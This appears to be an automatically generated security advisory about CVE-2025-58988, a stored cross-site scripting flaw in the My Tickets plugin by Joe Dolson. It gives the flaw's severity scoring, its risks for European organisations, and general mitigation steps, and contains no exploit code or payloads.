CVE-2025-58988 is a Stored Cross-Site Scripting (XSS) vulnerability identified in the Joe Dolson My Tickets software, affecting versions up to 2.0.22. This vulnerability arises from improper neutralization of input during web page generation, classified under CWE-79. Specifically, the application fails to adequately sanitize or encode user-supplied input before rendering it on web pages, allowing malicious scripts to be stored and executed in the context of other users' browsers. The vulnerability has a CVSS 3.1 base score of 6.5, indicating a medium severity level. The vector details (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) show that the attack can be performed remotely over the network with low attack complexity, requires low privileges, and user interaction is needed to trigger the exploit. The scope is changed, meaning the vulnerability affects resources beyond the initially vulnerable component. The impact includes limited confidentiality, integrity, and availability losses, as the attacker can execute arbitrary scripts, potentially stealing session tokens, defacing content, or performing actions on behalf of the victim user. No known exploits are currently reported in the wild, and no patches have been linked yet. The vulnerability was published recently in September 2025, with the assigner being Patchstack. The affected product, My Tickets by Joe Dolson, is a ticketing or event management system, likely used by organizations to manage event registrations and ticket sales.

For European organizations using the My Tickets platform, this vulnerability poses a risk of session hijacking, unauthorized actions, and data leakage through malicious script execution in users' browsers. This can lead to compromised user accounts, unauthorized ticket purchases or cancellations, and reputational damage. Since the vulnerability requires low privileges but user interaction, phishing or social engineering could be used to exploit it. The scope change indicates that the attacker could affect other components or user sessions beyond the initial vulnerable module, increasing potential damage. Confidentiality and integrity impacts are limited but non-negligible, and availability impact is low but possible if scripts disrupt service. Organizations handling sensitive customer data or financial transactions via this platform are at higher risk. Additionally, compliance with GDPR and other European data protection regulations could be jeopardized if personal data is exposed or manipulated due to this vulnerability.

1. Immediate mitigation should include applying any available patches or updates from Joe Dolson once released. 2. In the absence of patches, implement strict input validation and output encoding on all user-supplied data fields within the My Tickets application, especially those that generate web page content. 3. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. 4. Conduct thorough code reviews focusing on input handling and sanitization routines. 5. Educate users and administrators about phishing risks and encourage cautious interaction with links or inputs related to the ticketing system. 6. Monitor web application logs for unusual input patterns or script injections. 7. Use Web Application Firewalls (WAF) with rules tailored to detect and block XSS payloads targeting the My Tickets platform. 8. Segregate the ticketing system from other critical infrastructure to limit scope in case of compromise. 9. Regularly audit and test the application for XSS and other injection vulnerabilities using automated scanners and manual penetration testing.